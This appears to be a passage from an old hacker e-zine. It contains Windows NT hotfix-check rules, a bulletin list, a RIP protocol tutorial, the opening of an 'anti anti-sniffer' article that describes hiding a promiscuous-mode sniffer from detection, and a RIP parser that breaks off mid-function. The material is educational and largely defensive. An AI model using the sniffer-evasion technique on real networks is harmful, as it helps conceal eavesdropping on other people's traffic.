The file version must be checked and replaced in this rule File=%SystemRoot%\system32\pbserver.dll Version=7.1.2195.2478 NT4 MS00-095 A Description=MS00-095: Registry Permissions Info=http://www.microsoft.com/technet/security/bulletin/MS00-095.asp Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=24501 Q265714i.EXE -n -q -z File=%SystemRoot%\system32\TCPCFG.DLL Version=4.0.1381.7064 NT4 MS00-095 B Description=MS00-095: Registry Permissions Info=http://www.microsoft.com/technet/security/bulletin/MS00-095.asp Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=24501 Q265714i.EXE -n -q -z File=%SystemRoot%\system32\regacl40.exe Version=4.0.1381.7064 NT4 MS01-003 A Description=MS01-003 Winsock Mutex Info=http://www.microsoft.com/technet/security/bulletin/fq01-003.asp Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27272 Patch=http://www.microsoft.com/ntserver/nts/downloads/critical/q279336/download. asp For terminal Server Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27291 File=%SystemRoot%\system32\mswsock.dll Version=4.0.1381.7086 NT4 MS01-003 B Description=Q279336 MS01-003 Winsock Mutex Info=http://www.microsoft.com/technet/security/bulletin/fq01-003.asp Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27272 Patch=http://www.microsoft.com/ntserver/nts/downloads/critical/q279336/download. 
asp For terminal Server Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27291 File=%SystemRoot%\system32\ws2_32.dll Version=4.0.1381.7086 NT4 MS01-008 Description=MS01-008 NTLMSSP Privilege Elevation Info=http://www.microsoft.com/technet/security/bulletin/fq01-008.asp q280119i.exe -n -q -z Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27804 For terminal Server Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27824 File=%SystemRoot%\system32\NTLMSSPS.DLL Version=4.0.1381.7086 NT4 MS01-009 Description=MS01-009 Malformed PPTP Packet Stream Info=http://www.microsoft.com/TechNet/security/bulletin/MS01-009.asp Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27836 q283001i.exe -n -q -z File=%SystemRoot%\system32\drivers\raspptpe.sys Version=4.0.1381.7090 NT4 MS01-033 Description=MS01-033 Unchecked Buffer in Index Server ISAPI Extension Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30833 File=%SystemRoot%\system32\idq.dll Version=5.0.1781.3 NT4 MS01-035 A Description=FrontPage Server Extension Unchecked Buffer Info=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=31038 Patch=http://download.microsoft.com/download/winntsp/Patch/Q300477/NT4/EN-US/Q30 0477.exe File=%SYSTEMDRIVE%\Program Files\Common Files\Microsoft Shared\web server extensions\40\servsupp\fp4Amsft.dll Version=4.0.2.5121 NT4 MS01-035 B Description=FrontPage Server Extension Unchecked Buffer Info=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=31038 Patch=http://download.microsoft.com/download/winntsp/Patch/Q300477/NT4/EN-US/Q30 0477.exe File=%SYSTEMDRIVE%\Program Files\Common Files\Microsoft Shared\web server extensions\40\bin\fp4Awel.dll Version=4.0.2.5121 NT4 MS01-035 C Description=FrontPage Server Extension Unchecked Buffer Info=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=31038 Patch=http://download.microsoft.com/download/winntsp/Patch/Q300477/NT4/EN-US/Q30 0477.exe File=%SYSTEMDRIVE%\Program 
Files\Common Files\Microsoft Shared\web server extensions\40\bin\fp4Areg.dll Version=4.0.2.5121 NT4 MS99-025 Description=MS99-025 Unauthorized Access using ODBC File=%SystemDrive%\Program Files\Common Files\System\OLE DB\oledb32.dll Info=http://www.microsoft.com/TechNet/security/bulletin/ms99-025.asp Version=2.51.5303.0 NT4 MS99-041 Description=MS99-041: RASMAN Security Descriptor Info=http://www.microsoft.com/technet/security/bulletin/ms99-041.asp Patch=ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt40/Hotfixes- PostSP6/Security/Rasman-fix/ Perm=Administrators:(Full),Authenticated Users:(CQEAIUR),System:(Full) Type of check: Check permissions on a service RasMan NT4 MS99-046 A Description=MS99-046: TCP Initial Sequence Number Randomness Info=http://www.microsoft.com/technet/security/bulletin/ms99-046.asp Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=16764 q243835i.exe -n -q -z File=%SystemRoot%\system32\drivers\tcpip.sys Version=4.0.1381.7050 NT4 MS99-046 B Description=MS99-046: TCP Initial Sequence Number Randomness Info=http://www.microsoft.com/technet/security/bulletin/ms99-046.asp Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=16764 File=%SystemRoot%\system32\wshtcpip.dll Version=4.0.1381.336 NT4 MS99-047 A Description=MS99-047: Malformed Spooler Request Info=http://www.microsoft.com/technet/security/bulletin/ms99-047.asp Patch=http://download.microsoft.com/download/winntsrv40/Patch/Spooler-fix/NT4/EN -US/Q243649.exe File=%SystemRoot%\system32\spoolss.exe Version=4.0.1381.7022 NT4 MS99-047 B Description=MS99-047: Malformed Spooler Request Info=http://www.microsoft.com/technet/security/bulletin/ms99-047.asp http://download.microsoft.com/download/winntsrv40/Patch/Spooler-fix/NT4/EN-US/Q2 43649.exe Patch=File=%SystemRoot%\system32\spoolss.dll Version=4.0.1381.7022 NT4 MS99-047 C Description=MS99-047: Malformed Spooler Request Info=http://www.microsoft.com/technet/security/bulletin/ms99-047.asp 
Patch=http://download.microsoft.com/download/winntsrv40/Patch/Spooler-fix/NT4/EN -US/Q243649.exe File=%SystemRoot%\system32\localmon.dll Version=4.0.1381.7022 NT4 MS99-047 D Description=MS99-047: Malformed Spooler Request Info=http://www.microsoft.com/technet/security/bulletin/ms99-047.asp Patch=http://download.microsoft.com/download/winntsrv40/Patch/Spooler-fix/NT4/EN -US/Q243649.exe File=%SystemRoot%\system32\win32spl.dll Version=4.0.1381.7022 NT4 MS99-055 Description=MS99-055: Malformed Resource Enumeration Argument Info=http://www.microsoft.com/technet/security/bulletin/ms99-055.asp Patch=http://download.microsoft.com/download/winntsrv40/Update/srvsvc/NT4/EN-US/ Q246045.EXE q246045.exe -n -q -z File=%SystemRoot%\system32\srvsvc.dll Version=4.0.1381.7029 NT4 MS99-056 A Description=MS99-056: Syskey Keystream Reuse Info=http://www.microsoft.com/technet/security/bulletin/ms99-056.asp Patch=http://download.microsoft.com/download/winntsp/Patch/syskey/NT4/EN-US/Q248 183.EXE File=%SystemRoot%\system32\lsasrv.dll Version=4.0.1381.7029 NT4 MS99-056 B Description=MS99-056: Syskey Keystream Reuse Info=http://www.microsoft.com/technet/security/bulletin/ms99-056.asp Patch=http://download.microsoft.com/download/winntsp/Patch/syskey/NT4/EN-US/Q248 183.EXE File=%SystemRoot%\system32\samsrv.dll Version=4.0.1381.7030 NT4 MS99-057 Description=MS99-057: Malformed Security Identifier Request same as MS99-056 Rule=W2K MS01-037 D Inherit all the settings of this rule MS99-057 NT4 MS-Q249863 Description=Q249863 SGC Connections May Fail from Domestic Clients Info=http://support.microsoft.com/support/kb/articles/Q249/8/63.ASP Info=http://www.microsoft.com/Windows95/downloads/contents/WUCritical/schannel/D efault.asp Patch=http://www.microsoft.com/NTWorkstation/downloads/Critical/schannel/default .asp q249863i.exe -n -q -z File=%SystemRoot%\system32\schannel.dll Version=4.87.1961.1877 NT4 W2K MS00-094 Description=MS00-094: Phone Book Service Buffer Overflow 
Info=http://www.microsoft.com/technet/security/bulletin/ms00-094.asp
Patch=http://download.microsoft.com/download/win2000platform/Patch/Q276575/NT5/EN-US/Q276575_W2K_SP2_x86_en.EXE
File=%SystemRoot%\system32\pbserver.dll
Version=7.1.2195.2478

NT4 W2K MS01-022
Description=MS01-022 OLE DB Provider for Internet Publishing
Info=http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms01-004.asp
Patch=http://download.microsoft.com/download/win2000platform/Update/1.5/WIN98Me/EN-US/rbupdate.exe
File=This update replaces many files, which is why none are listed.

================================================================================
Below are the needed hotfixes for NT Server, based on the MS site.
================================================================================

December 2000
  MS00-095: Tool Available for "Registry Permissions" Vulnerability
  http://www.microsoft.com/technet/security/bulletin/MS00-095.asp
  MS00-094: Patch Available for "Phone Book Service Buffer Overflow" Vulnerability
  http://www.microsoft.com/technet/security/bulletin/MS00-094.asp

November 2000
  MS00-091: Patch Available for "Incomplete TCP/IP Packet" Vulnerability
  http://www.microsoft.com/technet/security/bulletin/MS00-091.asp
  MS00-083: Patch Available for "Netmon Protocol Parsing" Vulnerability
  http://www.microsoft.com/technet/security/bulletin/MS00-083.asp

October 2000
  MS00-070: Patch Available for "Multiple LPC and LPC Ports" Vulnerabilities
  http://www.microsoft.com/technet/security/bulletin/MS00-070.asp

July 2000
  MS00-052: Patch Available for "Relative Shell Path" Vulnerability
  http://www.microsoft.com/technet/security/bulletin/MS00-052.asp
  MS00-047: Patch Available for "NetBIOS Name Server Protocol Spoofing" Vulnerability
  http://www.microsoft.com/technet/security/bulletin/MS00-047.asp

June 2000
  MS00-040: Patch Available for "Remote Registry Access Authentication" Vulnerability
  http://www.microsoft.com/technet/security/bulletin/ms00-040.asp

May 2000
  MS00-036: Patch Available for "ResetBrowser Frame" and "HostAnnouncement Flooding" Vulnerabilities
  http://www.microsoft.com/technet/security/bulletin/ms00-036.asp
  MS00-029: Patch Available for "IP Fragment Reassembly" Vulnerability
  http://www.microsoft.com/technet/security/bulletin/ms00-029.asp

April 2000
  MS00-027: Patch Available for "Malformed Environment Variable" Vulnerability
  http://www.microsoft.com/technet/security/bulletin/ms00-027.asp
  MS00-024: Tool Available for "OffloadModExpo Registry Permissions" Vulnerability
  http://www.microsoft.com/technet/security/bulletin/ms00-024.asp

March 2000
  MS00-021: Patch Available for "Malformed TCP/IP Print Request" Vulnerability
  http://www.microsoft.com/technet/security/bulletin/ms00-021.asp
  MS00-008: Patch Available for "Registry Permissions" Vulnerability
  http://www.microsoft.com/technet/security/bulletin/ms00-008.asp

February 2000
  MS00-007: Patch Available for "Recycle Bin Creation" Vulnerability
  http://www.microsoft.com/technet/security/bulletin/ms00-007.asp

January 2000
  MS00-005: Patch Available for "Malformed RTF Control Word" Vulnerability
  http://www.microsoft.com/technet/security/bulletin/ms00-005.asp
  MS00-004: Patch Available for "RDISK Registry Enumeration File" Vulnerability
  http://www.microsoft.com/technet/security/bulletin/ms00-004.asp

December 1999
  MS99-057: Patch Available for "Malformed Security Identifier Request" Vulnerability
  http://www.microsoft.com/technet/security/bulletin/ms99-057.asp
  MS99-056: Patch Available for "Syskey Keystream Reuse" Vulnerability
  http://www.microsoft.com/technet/security/bulletin/ms99-056.asp
  MS99-055: Patch Available for "Malformed Resource Enumeration Argument" Vulnerability
  http://www.microsoft.com/technet/security/bulletin/ms99-055.asp

November 1999
  MS99-047: Patch Available for "Malformed Spooler Request" Vulnerability
  http://www.microsoft.com/technet/security/bulletin/ms99-047.asp

October 1999
  MS99-046: Patch Available to Improve TCP Initial Sequence Number Randomness
  http://www.microsoft.com/technet/security/bulletin/ms99-046.asp

September 1999
  MS99-041: Patch Available for "RASMAN Security Descriptor" Vulnerability
  http://www.microsoft.com/technet/security/bulletin/ms99-041.asp
  MS99-038: Patch Available for "Spoofed Route Pointer" Vulnerability
  http://www.microsoft.com/technet/security/bulletin/ms99-038.asp
  MS99-036: Windows NT 4.0 Does Not Delete Unattended Installation File
  http://www.microsoft.com/technet/security/bulletin/ms99-036.asp
  MS99-034: Patch Available for "Fragmented IGMP Packet" Vulnerability
  http://www.microsoft.com/technet/security/bulletin/ms99-034.asp

July 1999
  MS99-026: Patch Available for "Malformed Dialer Entry" Vulnerability
  http://www.microsoft.com/technet/security/bulletin/ms99-026.asp
  MS99-024: Patch Available for "Unprotected IOCTLs" Vulnerability
  http://www.microsoft.com/technet/security/bulletin/ms99-024.asp

June 1999
  MS99-023: Patch Available for "Malformed Image Header" Vulnerability
  http://www.microsoft.com/technet/security/bulletin/ms99-023.asp
  MS99-021: Patch Available for "CSRSS Worker Thread Exhaustion" Vulnerability
  http://www.microsoft.com/technet/security/bulletin/ms99-021.asp
  MS99-020: Patch Available for "Malformed LSA Request" Vulnerability
  http://www.microsoft.com/technet/security/bulletin/ms99-020.asp

May 1999
  MS99-017: Patch Available for "RAS and RRAS Password" Vulnerability
  http://www.microsoft.com/technet/security/bulletin/ms99-017.asp
  MS99-016: Patch Available for "Malformed Phonebook Entry" Vulnerability
  http://www.microsoft.com/technet/security/bulletin/ms99-016.asp
  MS99-015: Patch Available for "Malformed Help File" Vulnerability
  http://www.microsoft.com/technet/security/bulletin/ms99-015.asp

March 1999
  MS99-008: Patch Available for Windows NT "Screen Saver" Vulnerability
  http://www.microsoft.com/technet/security/bulletin/ms99-008.asp

February 1999
  MS99-007: Patch Available for "Taskpads Scripting" Vulnerability
  http://www.microsoft.com/technet/security/bulletin/ms99-007.asp
  MS99-006: Fix Available for Windows NT "KnownDLLs List" Vulnerability
  http://www.microsoft.com/technet/security/bulletin/ms99-006.asp
  MS99-004: Patch Available for Authentication Processing Error in Windows NT 4.0 Service Pack 4
  http://www.microsoft.com/technet/security/bulletin/ms99-004.asp

November 1998
  MS98-017: Patch Available for "Named Pipes Over RPC" Vulnerability
  http://www.microsoft.com/technet/security/bulletin/ms98-017.asp

September 1998
  MS98-014: Patch Available for "RPC Spoofing Denial of Service" Vulnerability
  http://www.microsoft.com/technet/security/bulletin/ms98-014.asp

August 1998
  MS98-012: Patch available for Security Vulnerabilities in Microsoft PPTP
  http://www.microsoft.com/technet/security/bulletin/ms98-012.asp

July 1998
  MS98-009: Patch Available for "Windows NT Privilege Elevation" Vulnerability
  http://www.microsoft.com/technet/security/bulletin/ms98-009.asp

March 1998
  MS98-001: Disabling Creation of Local Groups on a Domain by Non-Administrative Users
  http://www.microsoft.com/technet/security/bulletin/ms98-001.asp

================================================================================

>----------------------------------------<
>---After you install NT HotFixes ?   ---<
>----------------------------------------<

Fix Your Security

---> NT Server & Wks

Windows NT 4.0 Member Server Configuration Checklist
http://www.microsoft.com/technet/security/mbrsrvcl.asp
This checklist outlines the steps you should take to secure Windows NT servers
acting as member servers, either on their own or as part of a Windows NT or
Windows 2000 domain.

Windows NT 4.0 Workstation Configuration Checklist
http://www.microsoft.com/technet/security/wrkstchhk.asp
This checklist outlines the steps you should take to secure computers running
Windows NT Workstation, either on their own or as part of a Windows NT or
Windows 2000 domain.

Windows Domain Controller Checklist
http://www.microsoft.com/technet/security/dccklst.asp
This checklist outlines the steps you should take to secure servers acting as
Windows NT Server 4.0 domain controllers (DCs).

Windows NT C2 Configuration Checklist
http://www.microsoft.com/technet/security/c2config.asp
This checklist outlines the steps you should take to duplicate the C2-evaluated
configuration of Windows NT Server 4.0. Note that following this checklist does
not make your installation C2-compliant; it merely assures you that the software
configuration matches the configuration that the NCSC evaluated.

---> Advanced Server

Secure Internet Information Services 5 Checklist
http://www.microsoft.com/technet/security/iis5chk.asp
Recommendations and best practices to secure a server on the Web running
Microsoft Windows 2000 and Internet Information Services (IIS) 5.

Windows 2000 Internet Server Security Tool
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=19889
This tool makes it easy to secure an Internet server running IIS 5.0. It lets
you configure an IIS 5.0 server without needing to configure individual registry
settings, security policies, and other details.

Hotfix Checking Tool for IIS 5.0
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=24168
This tool enables IIS 5.0 administrators to ensure that their servers are up to
date on all security patches. The tool can be run continuously or periodically,
against the local machine or a remote one, using either a database on the
Microsoft website or a locally-hosted copy. When the tool finds a patch that
hasn't been installed, it can display a dialog or write a warning to the event
log.
>-------------------------<
>---Fix Your Registry  ---<
>-------------------------<

This step will be covered in detail in the next issue, KV12.

[Routing Information Protocol (RIP)]====================[pr00f/alkinoos]

+--[ Table of Contents ]------------------------------------------+
|                                                                 |
|  [1]- Introduction ....................................... -[1] |
|  [2]- Background ......................................... -[2] |
|  [3]- RIP Operation ...................................... -[3] |
|  [4]- Microsoft Specific RIP Features .................... -[4] |
|  [5]- RIPv1 Packet Details ............................... -[5] |
|  [6]- RIPv2 Packet Details ............................... -[6] |
|  [7]- RIPv2 Authentication ............................... -[7] |
|  [8]- Thanks ............................................. -[8] |
|                                                                 |
+-----------------------------------------------------------------+

= Introduction =

I decided to write on this subject for the upcoming Keen Veracity 11, a
publication brought out by the Legions of the Underground (LoU). I'm not usually
one to write a text or an article of any kind, as I don't have much confidence
in my writing. However, KV11 was in need of submissions. I wanted to write about
a subject that hasn't already been gone over a hundred times before. This was my
choice.
  - pr00f

The first time I had to deal with RIP, it was a nightmare. I had to find a way
for various pieces of equipment from different manufacturers to share routing
information. I hope that this will help those that might be interested in how
the world's most popular Interior Gateway Protocol (IGP) works, and maybe offer
insight to those who are trying to actually work with RIP.
  - alkinoos

= Background =

Although this document was written for people without much existing knowledge
of RIP, it does require a basic understanding of networking and perhaps TCP/IP.
Enjoy.

RIP is a distance-vector protocol that uses the hop count as its metric value
and is designed for IP networks. Basically, it determines the distance between
a packet's source and destination by counting the number of routers the packet
has to travel through (a metric is a number representing the distance to a
destination; in this case it's measured in routers). RIP is used for routing
only within a single autonomous system (the definition of an IGP). It was
originally drafted in 1988 (RFC 1058) and later upgraded in 1994 (RFC 1723).

= RIP Operation =

Networks have a certain topology that is sometimes static and sometimes
dynamic. RIP provides routing information for dynamically changing network
topologies. It also has safety-net features that prevent improper route
broadcasting, such as split horizon. The metric that RIP stores can range from
1 to 16; when the hop count reaches 16 it is considered infinite and the route
is considered unreachable, which helps prevent an infinite routing loop. This
also presents a shortcoming, as there may be networks that have more than 15
hops (although I hope I never have to deal with one ;). Determining the
shortest path by metric can also be misleading, because there are other
factors like latency and throughput that are not covered by RIP.

RIP messages are encapsulated in UDP (User Datagram Protocol) packets and
broadcast to the destination subnet on port 520.

RIP manages itself via timers. The routing-update timer keeps track of how long
to wait between routing updates and is generally set somewhere between half a
minute and a full minute. A small random number of seconds should be added to
or subtracted from this timer every time it is reset, in order to prevent
collisions with the timers of other routers. If a route is not renewed, it
remains in the table until the route-timeout timer expires, at which point it
is marked invalid; it is dropped from the routing table when the route-flush
timer expires.

One of the major differences between the two RIP versions is that RIPv2 has the
ability to support subnetting, supernetting, and Variable Length Subnet Masks
(VLSM) or Classless InterDomain Routing (CIDR). This is very important in
today's networks, and it is rare to see RIPv1 used. Another major difference,
and another reason RIPv1 is not used as much, is that RIPv2 supports
authentication.

RIPv2 also adds support for (optional) multicast RIP announcements, which are
sent to the IP multicast address 224.0.0.9. This helps keep non-RIP nodes from
being bothered by RIP announcements. Broadcast announcements are still
supported.

= Microsoft Specific RIP Features =

Just as with everything else, Microsoft has dipped its hand into the RIP pot and
pulled out some honey. They have implemented an enhanced, albeit optional,
variation of the traditional split horizon in Windows 2000: split horizon with
reverse poison. Unlike plain split horizon, a Windows 2000 RIP router that has
enabled reverse poison announces all of its routes. The big difference is that
the routes learned in a given direction are announced back in that direction
with a hop count of 16, indicating an unreachable network. Although this has no
benefit in a single-path internetwork, in a multi-path internetwork it
substantially reduces the count-to-infinity and routing loop problems that
commonly occur with RIP. The biggest disadvantage of split horizon with reverse
poison is the increased overhead of announcing all routes.

= RIPv1 Packet Details =

RIPv1 messages are encapsulated in UDP (User Datagram Protocol) packets and
broadcast to the subnet on port 520. The RIPv1 packet header consists of three
fields totaling 4 bytes in length.
The header format is diagrammed (from RFC 1058) and defined below:

 0                   1                   2                   3 3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| command (1)   | version (1)   |       must be zero (2)        |
+---------------+---------------+-------------------------------+

* The command byte determines the purpose of the packet. A value of 0x01 is a
  request for the neighboring routers to send all or part of their routing
  tables. A value of 0x02 is a response containing all or part of the router's
  routing table; it is usually sent in reply to a request or to a poll. Values
  0x03-0x04 have been obsoleted and are ignored. Sun Microsystems has
  implemented 0x05 for its own uses (this might warrant further investigation).
  This field is 1 byte in length.

* The version byte, obviously, contains the RIP version used in the packet.
  Since we're just going over RIPv1 at the moment, this will always be 0x01.
  This field is 1 byte in length.

* The last two bytes of the header are unused and should always be zero. This
  field is 2 bytes in length.

The rest of the RIPv1 message consists of 1 to 25 routes, each 20 bytes in
size. If there are more than 25 routes to send in an announcement, additional
announcements will be sent. Each route consists of six fields that define the
route's characteristics.

They are diagrammed (from RFC 1058) and defined below:

 0                   1                   2                   3 3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-------------------------------+-------------------------------+
| address family identifier (2) |        must be zero (2)       |
+-------------------------------+-------------------------------+
|                        IP address (4)                         |
+---------------------------------------------------------------+
|                       must be zero (4)                        |
+---------------------------------------------------------------+
|                       must be zero (4)                        |
+---------------------------------------------------------------+
|                          metric (4)                           |
+---------------------------------------------------------------+

* The address family identifier indicates to the router what protocol the
  route will be used for. This will almost always be 0x02, indicating the IP
  family, although there is also RIP for IPX. This field is 2 bytes in length.

* The next field is not used in RIPv1 and will always consist of zeros. It is
  used in RIPv2. This field is 2 bytes in length.

* The IP address is the destination for the route. This can be one of several
  values: a subnet network ID, an IP address when defining a host route, or
  0.0.0.0 when defining the default route. When sending a request message,
  this will always be 0.0.0.0. This field is 4 bytes in length.

* The next two fields are both unused in RIPv1 and should consist of only
  zeros. They are used in RIPv2. Each of these fields is 4 bytes in length.

* The last field, metric, is the number of hops that must be crossed to reach
  the network defined in the IP address field. This is a 4 byte field.

= RIPv2 Packet Details =

RIPv2, like RIPv1, can be encapsulated in UDP packets and broadcast to the
subnet. However, it also has the optional capability to use IP multicasting,
sending announcements to 224.0.0.9. The RIPv2 header is identical to the RIPv1
header, with the minor exception of the version number in the second field.
The header format is diagrammed (from RFC 1723) and the changes from RIPv1 are
defined below:

 0                   1                   2                   3 3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Command (1)   | Version (1)   |            unused             |
+---------------+---------------+-------------------------------+

* The second field, version, should always be 0x02 in RIPv2. For details on
  the other fields, refer to the RIPv1 header details in the section above.
  This field is 1 byte in length.

For backward compatibility the RIPv2 message format is identical to the RIPv1
message format. The key here is that RIPv2 takes advantage of the unused fields
that exist in the RIPv1 message. The creators of RIP were obviously thinking
ahead. Again, there can only be up to 25 routes in an announcement.

The route entry format is diagrammed (from RFC 1723) and the changes from RIPv1
are defined below:

 0                   1                   2                   3 3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-------------------------------+-------------------------------+
| Address Family Identifier (2) |         Route Tag (2)         |
+-------------------------------+-------------------------------+
|                        IP Address (4)                         |
+---------------------------------------------------------------+
|                        Subnet Mask (4)                        |
+---------------------------------------------------------------+
|                         Next Hop (4)                          |
+---------------------------------------------------------------+
|                          Metric (4)                           |
+---------------------------------------------------------------+

* The route tag was unused in RIPv1. It was originally meant to distinguish
  between RIP routes and routes learned from outside the RIP environment. This
  field is 2 bytes in length.

* The subnet mask is one of the defining points of RIPv2. Its inclusion allowed
  RIP to survive in a world of reduced address space. This field contains the
  subnet mask for the address in the IP address field. This field is 4 bytes in
  length.

* The next hop defines the gateway for the address in the IP address field. It
  is set to 0x00-00-00-00 if the route announcement is coming from the gateway
  itself. This field is 4 bytes in length.

= RIPv2 Authentication =

RIPv2's method for passing authentication is rather simple, but it's quite
effective. Normally a route entry would be the first thing after the RIP header
in a RIP announcement. When authentication is used, the first route entry is
replaced with an authentication entry. The authentication entry is the same
size, but the last four fields of the route entry are replaced with a single
16 byte field that contains the authentication password as either clear text,
encrypted text, or in the form of a hash (such as MD5).

The modified route entry used for authentication is diagrammed (from RFC 1723)
and defined below:

 0                   1                   2                   3 3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-------------------------------+-------------------------------+
|            0xFF-FF            |    Authentication Type (2)    |
+-------------------------------+-------------------------------+
~                      Authentication (16)                      ~
+---------------------------------------------------------------+

* The first field is normally the address family identifier that identifies
  the route protocol. When authentication is used, this field is replaced with
  0xFF-FF, which indicates the use of authentication. Routers not using
  authentication will see this as an invalid route and will ignore it. This
  field is 2 bytes in length.

* The authentication type field tells the router what method of password
  protection is being used. RFC 1723 only defines simple (clear text) password
  authentication, indicated by 0x02; note that with this type the password
  crosses the wire in clear text, so anyone who can sniff the segment can read
  it. Some routers do support MD5 and other methods. This field is 2 bytes in
  length.

* Finally, the authentication field contains the password. Passwords are
  limited to 16 characters in order to preserve the route entry layout.
  The passwords are left-justified and padded with 0x00 (null) characters. This
  field is 16 bytes in length.

Something to keep in mind is that because the authentication entry takes the
place of the first route entry, you will have one less route passed with each
RIP announcement. Of the 25 possible entries, only 24 of them can be route
entries.

= Thanks =

I'd like to thank a couple of people for making suggestions on what to include
and helping with the overall readability of the article: evilrabbit, Intelagent

[ANTI ANTI-SNIFFER PATCH]============================================[vecna]

http://www.s0ftpj.org - Italian security/hacking group.

HISTORY:
  Summer 2000:   thought of the patch
  November 2000: published code and Italian file
  July 2001:     I know that the code published on packetstorm cannot be
                 understood; this prompted me to write this readme file.

This work is coded and tested under Linux kernel 2.2[.15|.16]

FOCUS of this document is:
  i)  make a patch possible that eludes anti-sniffers and other programs that
      use the series of techniques explained in l0pht's studies.
  ii) suggest possible techniques for secure sniffer discovery.

Mac Address Check

This is an old technique: send packets to a valid IP address but with a fake
destination MAC address. Some stacks don't check the datalink-layer header and
hand the packet to the upper layer anyway. It is usually implemented with ICMP
echo requests and ARP requests, but it can be used with any kind of packet of
any protocol. Simply send the erroneous packets, and if you receive a reply you
can be sure that the source of the reply is running in promiscuous mode.

Fix

Simple: the anti-sniffer works because the stack replies without checking the
destination MAC. It is simple to make a kernel patch that drops any packet
whose destination MAC address differs from the network card's MAC address and
from ff:ff:ff:ff:ff:ff (the MAC broadcast address). Implemented as a kernel
module for Linux 2.2.
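Returning to the RIP article above: the following parser and encoder for the
RIPv1 and RIPv2 message formats (the 4-byte header, the 20-byte route entries,
and the RIPv2 authentication entry that takes the place of the first route) is
an added example and not code from the article or its authors. Besides decoding
the fields, it flags what a defender watching port 520 would want to notice:
non-zero reserved fields in a RIPv1 entry, routes announced with metric 16
(poisoned or unreachable), and RIPv2 responses that carry no authentication
entry at all. The sample announcement is constructed inline.

```python
"""RIPv1/RIPv2 message parser and encoder (RFC 1058 / RFC 1723 layouts)."""
import struct
from dataclasses import dataclass, field
from typing import List, Optional

AFI_INET = 2          # address family identifier for IP routes
AFI_AUTH = 0xFFFF     # first entry carries authentication instead of a route
AUTH_SIMPLE = 2       # RFC 1723 clear-text password: 16 bytes, NUL padded
INFINITY = 16         # hop count that means "unreachable"
MAX_ENTRIES = 25      # entries per announcement (24 routes when auth is present)


@dataclass
class Route:
    afi: int
    route_tag: int     # RIPv2 only; must be zero in RIPv1
    ip: str
    subnet_mask: str   # RIPv2 only; 0.0.0.0 in RIPv1
    next_hop: str      # RIPv2 only; 0.0.0.0 means "the announcing router"
    metric: int


@dataclass
class RipMessage:
    command: int       # 1 = request, 2 = response
    version: int
    auth_type: Optional[int] = None
    password: Optional[bytes] = None   # only decoded for AUTH_SIMPLE
    routes: List[Route] = field(default_factory=list)
    warnings: List[str] = field(default_factory=list)


def _dotted(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


def _packed(dotted: str) -> bytes:
    return bytes(int(octet) for octet in dotted.split("."))


def parse_rip(payload: bytes) -> RipMessage:
    """Decode one RIP UDP payload; suspicious fields are noted in .warnings."""
    if len(payload) < 4 or (len(payload) - 4) % 20:
        raise ValueError("RIP message is a 4-byte header plus 20-byte entries")
    command, version, pad = struct.unpack("!BBH", payload[:4])
    msg = RipMessage(command, version)
    if command not in (1, 2):
        msg.warnings.append(f"command {command} is obsolete or unknown")
    if pad:
        msg.warnings.append("header bytes 2-3 must be zero")
    entries = [payload[i:i + 20] for i in range(4, len(payload), 20)]
    if len(entries) > MAX_ENTRIES:
        msg.warnings.append(f"{len(entries)} entries exceeds the limit of 25")
    for idx, raw in enumerate(entries):
        afi, tag = struct.unpack("!HH", raw[:4])
        if afi == AFI_AUTH:            # authentication entry (RIPv2)
            if idx != 0:
                msg.warnings.append(f"entry {idx}: auth entry must be first")
                continue
            msg.auth_type = tag
            if tag == AUTH_SIMPLE:     # left-justified, padded with 0x00
                msg.password = raw[4:20].rstrip(b"\x00")
            continue
        ip, mask, nh, metric = struct.unpack("!4s4s4sI", raw[4:20])
        if version == 1 and (tag or mask != bytes(4) or nh != bytes(4)):
            msg.warnings.append(f"entry {idx}: RIPv1 reserved fields not zero")
        if metric < 1 or metric > INFINITY:
            msg.warnings.append(f"entry {idx}: metric {metric} outside 1..16")
        elif metric == INFINITY:
            msg.warnings.append(f"entry {idx}: {_dotted(ip)} announced unreachable")
        msg.routes.append(Route(afi, tag, _dotted(ip), _dotted(mask),
                                _dotted(nh), metric))
    if version == 2 and command == 2 and msg.auth_type is None:
        msg.warnings.append("RIPv2 response carries no authentication entry")
    return msg


def build_rip(version: int, routes: List[Route],
              password: Optional[bytes] = None) -> bytes:
    """Encode a RIP response; used here to construct the sample input."""
    out = [struct.pack("!BBH", 2, version, 0)]
    if password is not None:
        if version != 2 or len(password) > 16:
            raise ValueError("simple auth needs RIPv2 and at most 16 bytes")
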